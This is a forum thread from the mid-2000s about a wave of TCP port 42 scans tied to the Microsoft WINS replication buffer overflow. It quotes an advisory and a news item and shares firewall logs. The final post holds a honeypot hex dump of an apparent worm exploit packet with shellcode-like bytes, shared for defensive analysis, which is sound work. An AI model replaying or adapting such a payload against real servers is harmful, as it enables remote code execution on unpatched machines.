dslreports logo
site
 
    All Forums Hot Topics Gallery
spc

spacer




how-to block ads


Search Topic:
uniqs
838
share rss forum feed

CrookedSmile

join:2003-08-23
Lawrenceville, GA

Something new on port 42?

Has a new exploit come out today that takes advantage of port 42? Starting about 21:46 east coast time Sunday night I've been hit regularly and from a wide variety of ip ranges on this port. It's mostly tcp inbound stuff and doesn't sneak past the wall but it happened to occur at the same time as an increase in some totally unusual ports increasing in hits. Since the start of port 42 getting hit I've seen an increase on ports 40604, 11768, 55140, and a big jump in 22's numbers. I haven't heard or read anything on the forums here and elsewhere to state what this might be but I'm curious if it's affecting anyone else or if it's something I need to worry about. Dshield isn't providing results when I try to use its database for ports so I'm in the dark for now.



Name Game
Premium
join:2002-07-07
Grand Rapids, MI
kudos:7

1 edit

»isc.sans.org//port_details.php?port=42

This port is used in WINS replication. For more information see Microsoft KB#179442

TCP Port 42 port scans? What the heck over...
»www.derkeiler.com/Mailing-Lists/···509.html
see here for what is happening
»www.mynetwatchman.com/LID.asp?IID=140488860

--
Gladiator Security Forum »www.gladiator-antivirus.com/
Missing Kids
»www.missingkids.com/



Name Game
Premium
join:2002-07-07
Grand Rapids, MI
kudos:7
reply to CrookedSmile

Microsoft announces WINS exploit
Affects all versions of Windows servers, but who still uses WINS?
--------------------------------------------------------------------------------
posted 8:57am EST Mon Dec 06 2004 - submitted by J. Eric Smith
NEWS

Warm up the mouse buttons, it's patch time again for Windows users. Microsoft has acknowledged a flaw in the Windows Internet Naming Service (WINS) that could allow an attack to be launched against the system. All systems using WINS, which include NT 4.0, Windows 2000, and Windows Server 2003, are affected.

The attack takes the form of a buffer overflow, where the WINS server is sent messages too large for it to handle. By carefully crafting specific data packets, an attacker could exploit this to execute arbitrary code on an affected machine. Secunia currently rates this as a "moderately critical" vulnerability.

Microsoft issued a directive temporarily fixing the issue, but points out that WINS is no longer installed by default and very few organizations still use it. Microsoft's advice is to restrict traffic between WINS servers using IP security features built into Windows. Or, if you're not using WINS, just turn it off.

Microsoft also announced that this bug will be fixed in its next upcoming monthly patch release.

»www.geek.com/news/geeknews/2004D···8102.htm
--
Gladiator Security Forum »www.gladiator-antivirus.com/ Missing Kidshttp://www.missingkids.com/

CrookedSmile

join:2003-08-23
Lawrenceville, GA
reply to CrookedSmile

Thanks for the quick reply on that! It definately helps make the morning easier.

There are a couple of slight differences between their case and mine. I decided to drop down some examples of what hit me this morning in case anyone else is interested. I didn't capture any packets when it hit as it didn't trip snort. As of 10:01 eastern coast time all hits on 42 stopped entirely. Nothing to capture means this ends for me at this time. Thanks again!

08:26:15 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.85.145.248 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=112 ID=27602 DF PROTO=TCP SPT=1990 DPT=42 WINDOW=64240 RES=0x00 SYN URGP=0
08:38:13 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.71.44.140 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=111 ID=32586 DF PROTO=TCP SPT=3557 DPT=42 WINDOW=16384 RES=0x00 SYN URGP=0
09:03:33 kernel IN=eth1 OUT= MAC=mywanmac SRC=195.146.60.24 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=106 ID=16314 DF PROTO=TCP SPT=2423 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0
10:01:21 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.87.205.250 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=112 ID=62750 DF PROTO=TCP SPT=3218 DPT=42 WINDOW=16384 RES=0x00 SYN URGP=0



Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
kudos:3

1 edit
reply to CrookedSmile

I've seen just a couple here, but the pots are now on and tuned to capture this:

Jan 02, 2005 03:14:51.296 - (TCP) 220.82.219.235 : 1543 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:51.281 - (TCP) 220.82.219.235 : 1545 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:44.765 - (TCP) 220.82.219.235 : 1545 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:44.765 - (TCP) 220.82.219.235 : 1543 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:42.265 - (TCP) 220.82.219.235 : 1545 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:42.250 - (TCP) 220.82.219.235 : 1543 >>> 68.144.238.64 : 42
Jan 01, 2005 17:07:20.640 - (TCP) 68.84.122.53 : 4535 >>> 68.144.238.64 : 42

*Edit*
From a second IP that I monitor

Jan 02, 2005 07:29:44.739 - (TCP) 207.191.107.34 : 39063 >>> 68.144.238.148 : 42
Jan 02, 2005 07:29:41.825 - (TCP) 207.191.107.34 : 39063 >>> 68.144.238.148 : 42
Jan 01, 2005 17:07:43.768 - (TCP) 68.84.122.53 : 3134 >>> 68.144.238.148 : 42

Blake



Name Game
Premium
join:2002-07-07
Grand Rapids, MI
kudos:7
reply to CrookedSmile

2004-12-22 -
The recent rash of port scans targetting tcp/42 are likely sourced from malware which is attempting to exploit vulnerabilties in the Microsoft WINS - Windows Internet Naming Service:
VU#145134- Microsoft Windows Internet Naming Service (WINS) replication protocol contains a heap-based buffer overflow

Microsoft Windows Internet Naming Service (WINS) replication protocol contains a heap-based buffer overflow
Overview
A buffer overflow vulnerability in the Microsoft Windows Internet Naming Service (WINS) replication protocol may allow a remote attacker to execute arbitrary code or cause a denial-of-service condition.
I. Description
The Microsoft WINS service maps IP addresses to NETBIOS computer names. WINS servers share information via a server-to-server replication protocol that operates on TCP port 42. Connection information for replication peers is stored in a data structure called the association context. Insufficient validation of the buffer where the association context data structure is written allows a heap-based buffer overflow to occur. If a remote attacker supplies a specially crafted replication packet to a vulnerable WINS server, that attacker may be able to exploit the buffer overflow to write arbitrary data to WINS server process memory.

»www.kb.cert.org/vuls/id/145134
--
Gladiator Security Forum »www.gladiator-antivirus.com/ Missing Kidshttp://www.missingkids.com/



Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
kudos:3

1 edit
reply to CrookedSmile

PortPeeker capture of the new TCP Port 42 exploit. First some scan history from the offending IP Address as I have seen scans from this system before. Now granted not all the scans might have been from the exact same system as the scans go back a long way, however I would suspect some of the more recent scans to be from the same system (ie from Jan 3rd on). So you can see this system was previously infected and has now picked a new worm.

Jan 03, 2005 16:26:39.238 - (TCP) 68.144.235.53 : 3365 >>> 192.168.1.35 : 42
Jan 03, 2005 16:25:15.358 - (TCP) 68.144.235.53 : 3745 >>> 68.144.238.148 : 135
Jan 03, 2005 15:53:41.505 - (TCP) 68.144.235.53 : 3423 >>> 68.144.238.148 : 135
Jan 03, 2005 15:53:38.470 - (TCP) 68.144.235.53 : 3423 >>> 68.144.238.148 : 135
Jan 03, 2005 15:53:36.047 - (TCP) 68.144.235.53 : 3267 >>> 68.144.238.148 : 135
Jan 03, 2005 15:53:33.092 - (TCP) 68.144.235.53 : 3267 >>> 68.144.238.148 : 135
Jan 03, 2005 15:03:49.102 - (TCP) 68.144.235.53 : 2069 >>> 68.144.238.148 : 135
Jan 03, 2005 14:57:19.191 - (TCP) 68.144.235.53 : 3906 >>> 68.144.238.148 : 135
Jan 03, 2005 14:53:17.814 - (TCP) 68.144.235.53 : 2428 >>> 68.144.238.148 : 135
Jan 03, 2005 14:50:19.317 - (TCP) 68.144.235.53 : 2370 >>> 68.144.238.148 : 135
Jan 03, 2005 14:41:20.052 - (TCP) 68.144.235.53 : 2255 >>> 68.144.238.148 : 135
Jan 03, 2005 14:33:51.797 - (TCP) 68.144.235.53 : 2175 >>> 68.144.238.148 : 135
Jan 03, 2005 14:30:36.016 - (TCP) 68.144.235.53 : 2192 >>> 68.144.238.148 : 135
Jan 03, 2005 14:26:47.227 - (TCP) 68.144.235.53 : 2077 >>> 68.144.238.148 : 135
Jan 03, 2005 14:20:53.839 - (TCP) 68.144.235.53 : 1754 >>> 68.144.238.148 : 135
Jan 03, 2005 14:19:19.143 - (TCP) 68.144.235.53 : 2177 >>> 68.144.238.148 : 135
Jan 03, 2005 14:10:56.880 - (TCP) 68.144.235.53 : 2105 >>> 68.144.238.148 : 135
Jan 03, 2005 14:06:55.533 - (TCP) 68.144.235.53 : 2467 >>> 68.144.238.148 : 135
Jan 03, 2005 14:00:53.152 - (TCP) 68.144.235.53 : 2347 >>> 68.144.238.148 : 135
Jan 03, 2005 13:51:57.973 - (TCP) 68.144.235.53 : 2049 >>> 68.144.238.148 : 135
Jan 03, 2005 13:50:59.719 - (TCP) 68.144.235.53 : 1413 >>> 68.144.238.148 : 135
Jan 03, 2005 13:32:23.744 - (TCP) 68.144.235.53 : 1589 >>> 68.144.238.148 : 135
Jan 03, 2005 13:32:20.720 - (TCP) 68.144.235.53 : 1589 >>> 68.144.238.148 : 135
Jan 03, 2005 12:26:59.031 - (TCP) 68.144.235.53 : 3562 >>> 68.144.238.148 : 135
Jan 03, 2005 12:26:56.217 - (TCP) 68.144.235.53 : 3562 >>> 68.144.238.148 : 135
Apr 27, 2004 23:03:47.495 - (TCP) 68.144.235.53 : 1767 >>> 68.144.239.163 : 135
Apr 27, 2004 23:03:47.475 - (TCP) 68.144.235.53 : 1775 >>> 68.144.239.163 : 1025
Apr 27, 2004 23:03:47.455 - (TCP) 68.144.235.53 : 1829 >>> 68.144.239.163 : 445
Apr 27, 2004 23:03:41.477 - (TCP) 68.144.235.53 : 1829 >>> 68.144.239.163 : 445
Apr 27, 2004 23:03:41.457 - (TCP) 68.144.235.53 : 1775 >>> 68.144.239.163 : 1025
Apr 27, 2004 23:03:41.437 - (TCP) 68.144.235.53 : 1767 >>> 68.144.239.163 : 135
Apr 27, 2004 23:03:38.513 - (TCP) 68.144.235.53 : 1829 >>> 68.144.239.163 : 445
Apr 27, 2004 23:03:38.492 - (TCP) 68.144.235.53 : 1775 >>> 68.144.239.163 : 1025
Apr 27, 2004 23:03:38.452 - (TCP) 68.144.235.53 : 1767 >>> 68.144.239.163 : 135
Apr 27, 2004 18:31:29.412 - (TCP) 68.144.235.53 : 3014 >>> 68.144.239.163 : 445
Apr 27, 2004 18:31:29.392 - (TCP) 68.144.235.53 : 3010 >>> 68.144.239.163 : 1025
Apr 27, 2004 18:31:29.312 - (TCP) 68.144.235.53 : 2989 >>> 68.144.239.163 : 135

PortPeeker Capture
------------------
TCP Connection Request
---- 03/01/2005 16:35:41.151

68.144.235.53 : 3365 TCP Connected ID = 1
---- 03/01/2005 16:35:41.151
Status Code: 0 OK

68.144.235.53 : 3365 TCP Data In Length 1460 bytes
MD5 = 1E014250BE3EF36C51A9DB4912B77D57
---- 03/01/2005 16:35:43.925
0000 00 03 0D 4C 77 77 FF 77 05 4E 00 3C 01 02 03 04 ...Lww.w.N.....
0010 6C F4 3D 05 00 02 4E 05 00 02 4E 05 00 02 4E 05 l.=...N...N...N.
0020 00 02 4E 05 00 02 4E 05 00 02 4E 05 00 02 4E 05 ..N...N...N...N.
0030 00 02 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0040 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0050 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0060 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0070 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
0080 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0090 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
00A0 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
00B0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
00C0 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
00D0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
00E0 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
00F0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0100 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
0110 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0120 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
0130 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0140 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0150 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0160 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0170 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0180 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0190 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
01A0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
01B0 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
01C0 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
01D0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
01E0 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
01F0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0200 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0210 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0220 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
0230 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0240 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
0250 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0260 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0270 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0280 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0290 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
02A0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
02B0 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
02C0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
02D0 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
02E0 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
02F0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0300 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0310 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0320 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0330 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0340 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
0350 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0360 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
0370 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0380 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0390 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
03A0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
03B0 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
03C0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
03D0 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
03E0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
03F0 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
0400 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0410 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0420 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0430 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0440 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0450 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0460 90 00 4E 05 90 03 4E 05 90 00 4E 05 9E 2F 9F 43 ..N...N...N../.C
0470 95 49 43 45 95 9F F8 F9 93 49 90 4E FD 48 FD 92 .ICE.....I.N.H..
0480 41 4F 47 4D 4B 95 FD 46 F8 93 48 F8 3F 4B 9E 98 AOGMK..F..H.?K..
0490 48 FD 40 F9 37 93 4E 2F F8 4D 48 48 93 9E 37 93 H.@.7.N/.MHH..7.
04A0 9E 41 FD 4B 95 FD 4D 46 41 40 41 FC 4F 97 49 4E .A.K..MFA@A.O.IN
04B0 4A F9 97 40 4F F8 F5 47 27 4F 92 47 2F 46 F8 F9 J..@O..G'O.G/F..
04C0 F5 48 97 48 F8 F8 F9 90 91 45 49 45 98 4B 97 F9 .H.H.....EIE.K..
04D0 37 F8 F8 40 48 49 F9 96 97 4F 4F 49 4F 48 F9 96 7..@HI...OOIOH..
04E0 27 F9 37 27 3F F8 42 2F 93 4F 43 47 2F 4D 99 37 '.7'?.B/.OCG/M.7
04F0 4A 9E 42 F8 49 9F 4E FC 97 46 96 90 98 F8 27 F8 J.B.I.N..F....'.
0500 91 4F 9F 2F F9 4D F9 48 46 40 27 42 41 95 4B 45 .O./.M.HF@'BA.KE
0510 98 4E 9F 4E 99 46 48 46 99 40 2F 43 4B 95 F5 46 .N.N.FHF.@/CK..F
0520 4F 96 37 46 4E 93 48 42 F8 93 27 27 43 FD 43 93 O.7FN.HB..''C.C.
0530 90 40 90 40 93 F8 40 95 95 9E 46 37 49 41 47 FC .@.@..@...F7IAG.
0540 9F 49 4F 37 99 FC 96 45 4E 27 4E 96 47 F9 97 98 .IO7...EN'N.G...
0550 4D 90 91 40 4D 41 4D F8 4E 47 F9 FC 9E F9 9F 27 M..@MAM.NG.....'
0560 4B 99 40 43 37 95 4F 49 4A 90 96 9E 47 41 4F 46 K.@C7.OIJ...GAOF
0570 F9 48 41 F5 47 3F 9E 4A 92 90 43 96 90 97 F5 43 .HA.G?.J..C....C
0580 42 3F 49 46 48 96 40 FD 99 93 4B 93 46 FC 95 4B B?IFH.@...K.F..K
0590 95 F8 4D 49 3F 9E F8 48 45 98 47 92 2F 4D 4A 4E ..MI?..HE.G./MJN
05A0 46 FC 97 4D FD F5 90 FD 9E FD 96 F8 45 F5 4F 4F F..M........E.OO
05B0 F5 49 9E 27 .I.'

---- Echoed Data

68.144.235.53 : 3365 TCP Data In Length 1460 bytes
MD5 = 5B5E840EB87C75C966778A6DF09BA364
---- 03/01/2005 16:35:43.975
0000 47 4A F8 43 98 FD 90 99 42 9F 47 97 47 47 97 FC GJ.C....B.G.GG..
0010 43 47 F5 F9 4E 47 97 90 49 46 40 97 95 4E 91 46 CG..NG..IF@..N.F
0020 98 F5 2F 95 37 F5 4B 48 27 4D 91 4E 43 97 F8 49 ../.7.KH'M.NC..I
0030 9E 93 F9 F9 90 4B 49 37 91 9E F5 93 4D F5 3F F8 .....KI7....M.?.
0040 41 FD 96 4B FD 92 4B 45 FC 27 96 4B 91 98 48 4D A..K..KE.'.K..HM
0050 37 99 4E 3F F9 FC 3F 47 46 98 47 42 F8 99 49 4A 7.N?..?GF.GB..IJ
0060 96 97 40 47 92 9E F8 3F 46 92 47 37 2F 48 41 4E ..@G...?F.G7/HAN
0070 48 3F 42 96 37 45 45 27 FC 40 F8 46 4F 9E 99 99 H?B.7EE'.@.FO...
0080 48 4D 93 4D 41 99 90 9F 4B 96 4F 4D 43 90 FD 98 HM.MA...K.OMC...
0090 F8 3F 93 4B 99 97 4D 90 47 46 92 4A 43 91 48 4E .?.K..M.GF.JC.HN
00A0 95 43 FC 4B 93 4A 4F 91 40 FD 3F 4E 93 99 47 41 .C.K.JO.@.?N..GA
00B0 3F 48 F9 3F 40 3F 42 42 41 4A 99 98 99 27 46 4B ?H.?@?BBAJ...'FK
00C0 99 93 97 3F 47 9E 40 4B F5 4A 98 4E 40 99 95 97 ...?G.@K.J.N@...
00D0 98 46 3F 48 49 4D 92 37 FC 2F 96 4E 4F 49 37 99 .F?HIM.7./.NOI7.
00E0 41 3F FD 47 43 43 37 4A 96 45 37 9E F5 45 48 42 A?.GCC7J.E7..EHB
00F0 96 90 27 99 45 27 3F 43 9F 46 4B 4E F9 4A 4E 92 ..'.E'?C.FKN.JN.
0100 48 F8 41 4E F8 90 93 96 42 49 4D FC F5 42 93 93 H.AN....BIM..B..
0110 98 91 47 42 41 4D 3F 46 F8 F9 4E 2F 43 96 97 37 ..GBAM?F..N/C..7
0120 4B 4D 4F F5 41 49 4B 4A 4A 99 2F 49 90 43 9E 27 KMO.AIKJJ./I.C.'
0130 45 93 93 40 93 43 43 41 99 98 47 45 42 97 40 F5 E..@.CCA..GEB.@.
0140 F9 93 97 45 9F FC 27 40 47 4F 47 98 98 90 49 37 ...E..'@GOG...I7
0150 FC 9F 4B 48 98 4A 42 43 27 41 FD 98 96 FD 45 96 ..KH.JBC'A....E.
0160 4E 9E 45 97 96 48 97 9E 99 4B 4D 27 37 2F 46 43 N.E..H...KM'7/FC
0170 9F 92 48 F8 49 47 49 49 99 96 97 40 F8 27 2F F9 ..H.IGII...@.'/.
0180 4E F9 97 F5 99 F8 FC 4E 9E 40 4A 43 2F 49 98 45 N......N.@JC/I.E
0190 96 4B 92 91 42 F8 4E 91 97 4B 46 27 95 FC 4B F8 .K..B.N..KF'..K.
01A0 4D 37 F5 47 97 4E 98 92 4D 49 43 98 49 4E 49 4E M7.G.N..MIC.ININ
01B0 97 96 96 95 96 2F 91 40 47 F5 47 2F 43 96 27 48 ...../.@G.G/C.'H
01C0 98 F8 91 2F 9E 43 37 95 99 96 40 F5 41 43 95 37 .../.C7...@.AC.7
01D0 49 47 43 99 F5 95 37 4A 48 4D 41 FC 37 41 96 4B IGC...7JHMA.7A.K
01E0 90 9E F8 4A F8 48 F9 90 90 9F 4A 3F 41 48 98 90 ...J.H....J?AH..
01F0 96 FC 96 40 42 41 2F F9 40 96 37 41 43 42 46 95 ...@BA/.@.7ACBF.
0200 92 47 F8 41 41 4D 99 9F F5 41 95 90 4E F5 4F 92 .G.AAM...A..N.O.
0210 4A 48 40 93 40 27 FD 47 46 46 92 F8 48 40 4B 4B JH@.@'.GFF..H@KK
0220 96 2F 99 4D 2F 4D 27 4D 3F 91 42 2F 95 FD 98 2F ./.M/M'M?.B/.../
0230 2F 2F 4A FD 90 99 FD 93 F9 FC FD 41 90 9E 9F F9 //J........A....
0240 97 9F 90 4D 4F 43 37 96 F5 97 42 43 41 99 2F 93 ...MOC7...BCA./.
0250 47 48 37 91 98 42 41 42 FC 46 43 4A 99 45 96 99 GH7..BAB.FCJ.E..
0260 49 42 4A 48 2F 43 40 F5 42 FD 90 42 4A 99 47 2F IBJH/C@.B..BJ.G/
0270 46 49 93 92 48 97 4F 4A 91 95 43 3F 99 41 FD F8 FI..H.OJ..C?.A..
0280 9E 93 F8 9F 3F 49 3F F5 97 9E 47 46 9E F8 3F 4E ....?I?...GF..?N
0290 42 48 47 93 48 93 37 FD 45 99 98 46 49 47 42 F8 BHG.H.7.E..FIGB.
02A0 91 FC 90 4A 9E 40 41 3F 95 37 45 49 91 42 41 47 ...J.@A?.7EI.BAG
02B0 3F 4F F9 95 43 FD 43 F8 93 40 4B 92 3F 4B 4B 43 ?O..C.C..@K.?KKC
02C0 4E 92 41 37 46 91 95 41 F8 2F F9 F8 95 FD 41 48 N.A7F..A./....AH
02D0 27 2F 37 45 96 FD 99 F9 F8 4D 93 96 97 4D F9 46 '/7E.....M...M.F
02E0 45 F9 98 90 4D 40 41 45 48 4B 41 47 46 27 46 92 E...M@AEHKAGF'F.
02F0 F8 43 91 40 2F 90 48 4D 92 3F 46 46 4F F8 FD FD .C.@/.HM.?FFO...
0300 43 93 46 F5 40 93 46 4E 93 4B 4A F8 45 4E 4D 43 C.F.@.FN.KJ.ENMC
0310 49 93 3F 99 9E 46 92 90 41 FD 4A 95 43 96 45 F8 I.?..F..A.J.C.E.
0320 2F F9 4E F8 F8 37 F9 90 4A FC 41 90 48 4F FC 45 /.N..7..J.A.HO.E
0330 98 45 45 97 95 FC 43 4A 99 F5 27 93 46 4E 2F 9F .EE...CJ..'.FN/.
0340 92 46 FD 91 40 37 4E 49 47 4F 27 96 F8 4D 91 95 .F..@7NIGO'..M..
0350 40 41 4A 4A 97 92 4B 41 95 FD 9F 27 96 F5 FC 40 @AJJ..KA...'...@
0360 FD 91 99 47 42 49 48 95 45 48 9E 99 4D FC FC 2F ...GBIH.EH..M../
0370 27 46 90 4A 45 4F 49 97 4B 4B 48 45 FC 95 91 FC 'F.JEOI.KKHE....
0380 93 9E 9E 40 49 42 9F 42 42 91 2F 99 47 45 92 95 ...@IB.BB./.GE..
0390 FC 95 46 FD 90 47 93 9F F9 42 F9 37 4E 4E 40 9E ..F..G...B.7NN@.
03A0 42 9F 41 90 2F 49 99 95 4F 3F 4D 3F 93 95 95 4A B.A./I..O?M?...J
03B0 27 95 93 2F 90 49 42 4D 9F 37 FC 4D 93 37 96 F5 '../.IBM.7.M.7..
03C0 43 4A 2F FC 40 2F 3F FC 91 98 9E 47 4F 27 43 41 CJ/.@/?....GO'CA
03D0 4E F5 92 27 97 FC 2F 48 9F 90 45 F8 4F 92 98 43 N..'../H..E.O..C
03E0 41 99 92 99 46 9F 27 27 27 46 9E 98 9F 96 F5 48 A...F.'''F.....H
03F0 2F 4F 43 99 F9 9F 93 45 FC 3F 92 41 3F 4A F5 99 /OC....E.?.A?J..
0400 9E 46 4A 4E 93 4D F8 92 FC 43 3F 27 9F 9E 46 4A .FJN.M...C?'..FJ
0410 4B 41 98 45 4E F9 4A 4E 41 2F 49 46 FD F8 F8 48 KA.EN.JNA/IF...H
0420 91 F8 FC 46 2F 47 41 45 FD 40 F8 37 FD 4F 99 2F ...F/GAE.@.7.O./
0430 4A 92 F8 27 92 4E 2F 27 F5 96 48 4E 47 3F 4E 93 J..'.N/'..HNG?N.
0440 97 41 4F 96 93 F5 F9 96 F9 F8 40 9F 92 FC 45 95 .AO.......@...E.
0450 99 93 9E 4B 99 3F 90 95 FC 96 4D 2F 37 92 4E 9F ...K.?....M/7.N.
0460 99 41 47 95 F9 41 F8 42 37 9E FC FD 4A 96 F5 42 .AG..A.B7...J..B
0470 4D 91 4A 37 F9 45 90 99 41 93 48 42 46 46 4A 99 M.J7.E..A.HBFFJ.
0480 9F 40 4B 49 95 9F 95 F5 4E 90 98 4F 49 F9 9E 40 .@KI....N..OI..@
0490 F8 43 4B 37 9E 47 4E 48 37 97 43 FC 48 93 97 FD .CK7.GNH7.C.H...
04A0 FC F8 95 4E 93 90 FC 46 37 2F 42 48 48 4E 40 43 ...N...F7/BHHN@C
04B0 97 3F FC 42 4A 43 F9 FC 49 98 3F 40 46 46 3F 40 .?.BJC..I.?@FF?@
04C0 93 9E 96 4E F9 97 46 98 F5 9E 45 40 90 46 43 4A ...N..F...E@.FCJ
04D0 4F 48 92 3F 99 99 4A 40 93 43 96 42 49 4E 47 46 OH.?..J@.C.BINGF
04E0 47 98 98 3F 40 FC 2F 99 42 97 3F 4A F5 40 F5 49 G..?@./.B.?J.@.I
04F0 99 F5 F8 45 43 43 40 2F 49 47 9F 95 46 2F FD FD ...ECC@/IG..F/..
0500 40 4E 41 4D 4D FC 45 4A 9E 90 46 4F 92 99 F9 4D @NAMM.EJ..FO...M
0510 92 F9 90 92 46 2F 90 9E 47 43 F9 93 43 4F 27 96 ....F/..GC..CO'.
0520 40 F8 4B 37 4A F8 91 96 47 92 45 41 46 96 4A 99 @.K7J...G.EAF.J.
0530 47 4B 47 93 4D 95 3F 49 91 48 43 97 27 46 F8 42 GKG.M.?I.HC.'F.B
0540 42 FC 37 96 92 99 40 4E 9E 46 FD 43 93 42 4B F5 B.7...@N.F.C.BK.
0550 4F 97 4E 98 46 4A 27 9F 2F FD 96 41 95 FD 43 98 O.N.FJ'./..A..C.
0560 43 9E 99 47 4D F8 FC 4E 91 98 3F 93 3F 47 3F F5 C..GM..N..?.?G?.
0570 99 F8 46 48 4D 46 FC F8 4B 90 4D 4E 9F 93 37 2F ..FHMF..K.MN..7/
